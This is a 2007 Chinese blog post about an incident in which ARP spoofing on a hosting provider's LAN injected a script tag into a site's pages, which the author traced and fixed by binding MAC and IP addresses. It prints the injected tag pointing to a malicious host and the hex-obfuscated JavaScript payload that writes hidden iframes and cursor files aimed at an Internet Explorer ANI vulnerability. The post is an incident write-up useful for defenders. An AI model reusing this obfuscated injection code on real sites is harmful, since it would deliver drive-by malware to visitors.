网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
基于jquery实现的移入页面上空文本框时,让它变为焦点,移出清除焦点
Jul 26 Javascript
Jquery中ajax方法data参数的用法小结
Feb 12 Javascript
jQuery中filter()方法用法实例
Jan 06 Javascript
Vue中使用Sortable的示例代码
Apr 07 Javascript
vue ssr 指南详读
Jun 29 Javascript
vue解决一个方法同时发送多个请求的问题
Sep 25 Javascript
vue多级复杂列表展开/折叠及全选/分组全选实现
Nov 05 Javascript
详解JS判断页面是在手机端还是在PC端打开的方法
Apr 26 Javascript
详解iframe跨域的几种常用方法(小结)
Apr 29 Javascript
JS回调函数 callback的理解与使用案例分析
Sep 09 Javascript
layer.alert回调函数执行关闭弹窗的实例
Sep 11 Javascript
jQuery实现form表单基于ajax无刷新提交方法实例代码
Nov 04 jQuery
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
用PHP调用数据库的存贮过程!
2006/10/09 PHP
PHP学习之数组的定义和填充
2011/04/17 PHP
JavaScript对象数组的排序处理方法
2015/10/21 Javascript
jQuery EasyUi实战教程之布局篇
2016/01/26 Javascript
jQuery插件HighCharts绘制2D柱状图、折线图和饼图的组合图效果示例【附demo源码下载】
2017/03/09 Javascript
Angular.js基础学习之初始化
2017/03/10 Javascript
Vue2.0 多 Tab切换组件的封装实例
2017/07/28 Javascript
CentOS环境中MySQL修改root密码方法
2018/01/07 Javascript
jQuery基于闭包实现的显示与隐藏div功能示例
2018/06/09 jQuery
jQuery使用动画队列自定义动画操作示例
2018/06/16 jQuery
nodejs基础之常用工具模块util用法分析
2018/12/26 NodeJs
详解在HTTPS 项目中使用百度地图 API
2019/04/26 Javascript
Vue.js标签页组件使用方法详解
2019/10/19 Javascript
vue中watch的用法汇总
2020/12/28 Vue.js
[07:52]2014DOTA2 TI逗比武士游V社解说背后的故事
2014/07/10 DOTA
python分割和拼接字符串
2013/11/01 Python
python查找第k小元素代码分享
2013/12/18 Python
Python学习笔记_数据排序方法
2014/05/22 Python
python开发之str.format()用法实例分析
2016/02/22 Python
浅谈django的render函数的参数问题
2018/10/16 Python
Python实现直方图均衡基本原理解析
2019/08/08 Python
常用python爬虫库介绍与简要说明
2020/01/25 Python
给Python学习者的文件读写指南(含基础与进阶)
2020/01/29 Python
Python Handler处理器和自定义Opener原理详解
2020/03/05 Python
Django之腾讯云短信的实现
2020/06/12 Python
美国顶级水上运动专业店:Marine Products
2018/04/15 全球购物
教师节促销活动方案
2014/02/14 职场文书
yy婚礼主持词
2014/03/14 职场文书
2014年两会学习心得范例
2014/03/17 职场文书
建筑安全生产目标责任书
2014/07/23 职场文书
2014年重阳节老干部座谈会局领导发言稿
2014/09/25 职场文书
2014年网络管理员工作总结
2014/12/01 职场文书
成品仓管员岗位职责
2015/04/01 职场文书
2015年幼师工作总结
2015/04/28 职场文书
校运会广播稿
2015/08/19 职场文书
nginx反向代理时如何保持长连接
2021/03/31 Servers